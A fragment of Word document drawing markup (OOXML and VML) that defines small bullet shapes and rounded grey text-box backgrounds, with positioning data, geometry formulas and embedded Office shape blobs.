                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 2328 2328"/>
                            <a:gd name="T23" fmla="*/ 2328 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 2328 2328"/>
                            <a:gd name="T27" fmla="*/ 2328 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 2352 2328"/>
                            <a:gd name="T31" fmla="*/ 2352 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 2355 2328"/>
                            <a:gd name="T35" fmla="*/ 2355 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 2376 2328"/>
                            <a:gd name="T39" fmla="*/ 237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184AE4" id="Freeform 448" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:116.4pt;width:2.45pt;height:2.45pt;z-index:-15556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" path="m28,48r-7,l18,48,,27,,21,21,r7,l49,24r,3l28,48xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,1508760;13335,1508760;11430,1508760;0,1495425;0,1491615;13335,1478280;17780,1478280;31115,1493520;31115,1495425;17780,15087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6038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1431925</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="308610" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="444" name="Group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610" cy="116205"/>
                          <a:chOff x="1930" y="2255"/>
                          <a:chExt cx="486" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="445" name="Freeform 447"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="2254"/>
                            <a:ext cx="486" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2395 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 486"/>
                              <a:gd name="T2" fmla="+- 0 2437 2255"/>
                              <a:gd name="T3" fmla="*/ 2437 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 486"/>
                              <a:gd name="T6" fmla="+- 0 2437 2255"/>
                              <a:gd name="T7" fmla="*/ 2437 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 486"/>
                              <a:gd name="T10" fmla="+- 0 2436 2255"/>
                              <a:gd name="T11" fmla="*/ 2436 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 486"/>
                              <a:gd name="T14" fmla="+- 0 2416 2255"/>
                              <a:gd name="T15" fmla="*/ 2416 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 486"/>
                              <a:gd name="T18" fmla="+- 0 2413 2255"/>
                              <a:gd name="T19" fmla="*/ 2413 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 486"/>
                              <a:gd name="T22" fmla="+- 0 2276 2255"/>
                              <a:gd name="T23" fmla="*/ 2276 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 486"/>
                              <a:gd name="T26" fmla="+- 0 2255 2255"/>
                              <a:gd name="T27" fmla="*/ 2255 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2395 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 486"/>
                              <a:gd name="T30" fmla="+- 0 2255 2255"/>
                              <a:gd name="T31" fmla="*/ 2255 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2416 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 486"/>
                              <a:gd name="T34" fmla="+- 0 2276 2255"/>
                              <a:gd name="T35" fmla="*/ 2276 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2416 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 486"/>
                              <a:gd name="T38" fmla="+- 0 2416 2255"/>
                              <a:gd name="T39" fmla="*/ 2416 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2398 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 486"/>
                              <a:gd name="T42" fmla="+- 0 2436 2255"/>
                              <a:gd name="T43" fmla="*/ 2436 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2395 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 486"/>
                              <a:gd name="T46" fmla="+- 0 2437 2255"/>
                              <a:gd name="T47" fmla="*/ 243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86" h="183">
                                <a:moveTo>
                                  <a:pt x="46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65" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="486" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="486" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="468" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="46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Text Box 44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2254"/>
                            <a:ext cx="48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&amp;#60;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5" o:spid="_x0000_s1971" style="position:absolute;margin-left:96.5pt;margin-top:112.75pt;width:24.3pt;height:9.15pt;z-index:-15556096;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,2255" coordsize="48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">
                <v:shape id="Freeform 447" o:spid="_x0000_s1972" style="position:absolute;left:1930;top:2254;width:486;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="48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DMi8cA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/IKvRSz0VopaVaRSkEEpVFBentk&#10;n0kw+zbNbk38965Q6HGYmW+YdN6bWlyodZVlBaMoBkGcW11xoeCw/xy+gXAeWWNtmRRcycF8NnhI&#10;MdG244wuO1+IAGGXoILS+yaR0uUlGXSRbYiDd7KtQR9kW0jdYhfgppbjOJ5KgxWHhRIb+igpP+9+&#10;jYLld3bttquf5+PGYd2t/fHrJF+UenrsF+8gPPX+P/zXXmkFk8kr3M+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7QzIvHAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m465,182r-444,l18,181,,161r,-3l,21,21,,465,r21,21l486,161r-18,20l465,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="465,2437;21,2437;18,2436;0,2416;0,2413;0,2276;21,2255;465,2255;486,2276;486,2416;468,2436;465,2437" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 446" o:spid="_x0000_s1973" type="#_x0000_t202" style="position:absolute;left:1930;top:2254;width:48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92RMUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/IKvelGk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f3ZE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&amp;#60;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6089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1694180</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="443" name="Freeform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716 2668"/>
                            <a:gd name="T3" fmla="*/ 2716 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 2716 2668"/>
                            <a:gd name="T7" fmla="*/ 2716 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 2716 2668"/>
                            <a:gd name="T11" fmla="*/ 2716 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 2695 2668"/>
                            <a:gd name="T15" fmla="*/ 2695 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 2689 2668"/>
                            <a:gd name="T19" fmla="*/ 2689 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 2668 2668"/>
                            <a:gd name="T23" fmla="*/ 2668 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 2668 2668"/>
                            <a:gd name="T27" fmla="*/ 2668 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 2692 2668"/>
                            <a:gd name="T31" fmla="*/ 2692 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 2695 2668"/>
                            <a:gd name="T35" fmla="*/ 2695 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 2716 2668"/>
                            <a:gd name="T39" fmla="*/ 271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4BC78" id="Freeform 444" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:133.4pt;width:2.45pt;height:2.45pt;z-index:-15555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" path="m28,48r-7,l18,48,,27,,21,21,r7,l49,24r,3l28,48xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,1724660;13335,1724660;11430,1724660;0,1711325;0,1707515;13335,1694180;17780,1694180;31115,1709420;31115,1711325;17780,17246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6140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1647825</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="363220" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="440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16205"/>
                          <a:chOff x="1930" y="2595"/>
                          <a:chExt cx="572" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="441" name="Freeform 443"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="2594"/>
                            <a:ext cx="572" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2480 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 572"/>
                              <a:gd name="T2" fmla="+- 0 2777 2595"/>
                              <a:gd name="T3" fmla="*/ 2777 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 572"/>
                              <a:gd name="T6" fmla="+- 0 2777 2595"/>
                              <a:gd name="T7" fmla="*/ 2777 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 572"/>
                              <a:gd name="T10" fmla="+- 0 2777 2595"/>
                              <a:gd name="T11" fmla="*/ 2777 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 572"/>
                              <a:gd name="T14" fmla="+- 0 2756 2595"/>
                              <a:gd name="T15" fmla="*/ 2756 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 572"/>
                              <a:gd name="T18" fmla="+- 0 2753 2595"/>
                              <a:gd name="T19" fmla="*/ 2753 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 572"/>
                              <a:gd name="T22" fmla="+- 0 2616 2595"/>
                              <a:gd name="T23" fmla="*/ 2616 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 572"/>
                              <a:gd name="T26" fmla="+- 0 2595 2595"/>
                              <a:gd name="T27" fmla="*/ 2595 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2480 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 572"/>
                              <a:gd name="T30" fmla="+- 0 2595 2595"/>
                              <a:gd name="T31" fmla="*/ 2595 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2501 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 572"/>
                              <a:gd name="T34" fmla="+- 0 2616 2595"/>
                              <a:gd name="T35" fmla="*/ 2616 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2501 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 572"/>
                              <a:gd name="T38" fmla="+- 0 2756 2595"/>
                              <a:gd name="T39" fmla="*/ 2756 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2483 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 572"/>
                              <a:gd name="T42" fmla="+- 0 2777 2595"/>
                              <a:gd name="T43" fmla="*/ 2777 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2480 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 572"/>
                              <a:gd name="T46" fmla="+- 0 2777 2595"/>
                              <a:gd name="T47" fmla="*/ 277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2" h="183">
                                <a:moveTo>
                                  <a:pt x="55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50" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="571" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="571" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="553" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="55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Text Box 44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2594"/>
                            <a:ext cx="57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&amp;#060;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1" o:spid="_x0000_s1974" style="position:absolute;margin-left:96.5pt;margin-top:129.75pt;width:28.6pt;height:9.15pt;z-index:-15555072;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,2595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">
                <v:shape id="Freeform 443" o:spid="_x0000_s1975" style="position:absolute;left:1930;top:2594;width:572;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="57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UGLcYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT0vDQBTE74LfYXmCN7upBtum3RYRq+2t/yh4e2Zf&#10;k5Ds27i7pvHbuwWhx2FmfsPMFr1pREfOV5YVDAcJCOLc6ooLBYf98mEMwgdkjY1lUvBLHhbz25sZ&#10;ZtqeeUvdLhQiQthnqKAMoc2k9HlJBv3AtsTRO1lnMETpCqkdniPcNPIxSZ6lwYrjQoktvZaU17sf&#10;o6B+f+q+R5vP9mty/HCpLuq1Wb4pdX/Xv0xBBOrDNfzfXmkFaTqEy5l4BO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UGLcYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m550,182r-529,l18,182,,161r,-3l,21,21,,550,r21,21l571,161r-18,21l550,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="550,2777;21,2777;18,2777;0,2756;0,2753;0,2616;21,2595;550,2595;571,2616;571,2756;553,2777;550,2777" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 442" o:spid="_x0000_s1976" type="#_x0000_t202" style="position:absolute;left:1930;top:2594;width:5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RwR8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/IKvZlNRcS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HBH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&amp;#060;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6192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1917700</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="439" name="Freeform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3069 3020"/>
                            <a:gd name="T3" fmla="*/ 3069 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 3069 3020"/>
                            <a:gd name="T7" fmla="*/ 3069 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 3068 3020"/>
                            <a:gd name="T11" fmla="*/ 3068 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 3048 3020"/>
                            <a:gd name="T15" fmla="*/ 3048 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 3041 3020"/>
                            <a:gd name="T19" fmla="*/ 3041 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 3020 3020"/>
                            <a:gd name="T23" fmla="*/ 3020 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 3020 3020"/>
                            <a:gd name="T27" fmla="*/ 3020 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 3044 3020"/>
                            <a:gd name="T31" fmla="*/ 3044 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 3048 3020"/>
                            <a:gd name="T35" fmla="*/ 3048 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 3069 3020"/>
                            <a:gd name="T39" fmla="*/ 306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E4199" id="Freeform 440" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:151pt;width:2.45pt;height:2.45pt;z-index:-1555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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,24r,4l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,1948815;13335,1948815;11430,1948180;0,1935480;0,1931035;13335,1917700;17780,1917700;31115,1932940;31115,1935480;17780,194881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6243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1871345</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="417195" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="436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1930" y="2947"/>
                          <a:chExt cx="657" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="437" name="Freeform 439"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="2947"/>
                            <a:ext cx="657" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2565 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 657"/>
                              <a:gd name="T2" fmla="+- 0 3130 2947"/>
                              <a:gd name="T3" fmla="*/ 3130 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 657"/>
                              <a:gd name="T6" fmla="+- 0 3130 2947"/>
                              <a:gd name="T7" fmla="*/ 3130 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 657"/>
                              <a:gd name="T10" fmla="+- 0 3129 2947"/>
                              <a:gd name="T11" fmla="*/ 3129 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 657"/>
                              <a:gd name="T14" fmla="+- 0 3108 2947"/>
                              <a:gd name="T15" fmla="*/ 3108 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 657"/>
                              <a:gd name="T18" fmla="+- 0 3105 2947"/>
                              <a:gd name="T19" fmla="*/ 3105 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 657"/>
                              <a:gd name="T22" fmla="+- 0 2968 2947"/>
                              <a:gd name="T23" fmla="*/ 2968 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 657"/>
                              <a:gd name="T26" fmla="+- 0 2947 2947"/>
                              <a:gd name="T27" fmla="*/ 2947 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2565 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 657"/>
                              <a:gd name="T30" fmla="+- 0 2947 2947"/>
                              <a:gd name="T31" fmla="*/ 2947 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2586 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 657"/>
                              <a:gd name="T34" fmla="+- 0 2968 2947"/>
                              <a:gd name="T35" fmla="*/ 2968 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2586 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 657"/>
                              <a:gd name="T38" fmla="+- 0 3108 2947"/>
                              <a:gd name="T39" fmla="*/ 3108 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2568 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 657"/>
                              <a:gd name="T42" fmla="+- 0 3129 2947"/>
                              <a:gd name="T43" fmla="*/ 3129 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2565 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 657"/>
                              <a:gd name="T46" fmla="+- 0 3130 2947"/>
                              <a:gd name="T47" fmla="*/ 313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35" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="656" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="656" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="638" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="63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2947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&amp;#0060;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7" o:spid="_x0000_s1977" style="position:absolute;margin-left:96.5pt;margin-top:147.35pt;width:32.85pt;height:9.15pt;z-index:-15554048;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,2947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">
                <v:shape id="Freeform 439" o:spid="_x0000_s1978" style="position:absolute;left:1930;top:2947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h37MUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2vCQBTE7wW/w/IEb3W3UfyTukopCIp6MLbg8ZF9&#10;TUKzb0N21fjtXaHQ4zAzv2EWq87W4kqtrxxreBsqEMS5MxUXGr5O69cZCB+QDdaOScOdPKyWvZcF&#10;psbd+EjXLBQiQtinqKEMoUml9HlJFv3QNcTR+3GtxRBlW0jT4i3CbS0TpSbSYsVxocSGPkvKf7OL&#10;1RCy2bdKfG4LVHu/OyS77Xk+1XrQ7z7eQQTqwn/4r70xGsajKTzPx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mHfsxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m635,183r-614,l18,182,,161r,-3l,21,21,,635,r21,21l656,161r-18,21l635,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="635,3130;21,3130;18,3129;0,3108;0,3105;0,2968;21,2947;635,2947;656,2968;656,3108;638,3129;635,3130" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 438" o:spid="_x0000_s1979" type="#_x0000_t202" style="position:absolute;left:1930;top:2947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00MIA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+D/Y/hDfwNlM3kV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qjTQ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&amp;#0060;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6294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2133600</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="435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3409 3360"/>
                            <a:gd name="T3" fmla="*/ 3409 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 3409 3360"/>
                            <a:gd name="T7" fmla="*/ 3409 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 3408 3360"/>
                            <a:gd name="T11" fmla="*/ 3408 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 3388 3360"/>
                            <a:gd name="T15" fmla="*/ 3388 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 3381 3360"/>
                            <a:gd name="T19" fmla="*/ 3381 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 3360 3360"/>
                            <a:gd name="T23" fmla="*/ 3360 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 3360 3360"/>
                            <a:gd name="T27" fmla="*/ 3360 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 3385 3360"/>
                            <a:gd name="T31" fmla="*/ 3385 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 3388 3360"/>
                            <a:gd name="T35" fmla="*/ 3388 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 3409 3360"/>
                            <a:gd name="T39" fmla="*/ 340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1E4B4" id="Freeform 436" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:168pt;width:2.45pt;height:2.45pt;z-index:-1555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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,25r,3l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,2164715;13335,2164715;11430,2164080;0,2151380;0,2146935;13335,2133600;17780,2133600;31115,2149475;31115,2151380;17780,216471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6345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2087245</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="471170" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="432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3287"/>
                          <a:chExt cx="742" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="433" name="Freeform 435"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="3287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3470 3287"/>
                              <a:gd name="T3" fmla="*/ 3470 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 742"/>
                              <a:gd name="T6" fmla="+- 0 3470 3287"/>
                              <a:gd name="T7" fmla="*/ 3470 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 742"/>
                              <a:gd name="T10" fmla="+- 0 3469 3287"/>
                              <a:gd name="T11" fmla="*/ 3469 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 742"/>
                              <a:gd name="T14" fmla="+- 0 3449 3287"/>
                              <a:gd name="T15" fmla="*/ 3449 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 742"/>
                              <a:gd name="T18" fmla="+- 0 3445 3287"/>
                              <a:gd name="T19" fmla="*/ 3445 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 742"/>
                              <a:gd name="T22" fmla="+- 0 3309 3287"/>
                              <a:gd name="T23" fmla="*/ 3309 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
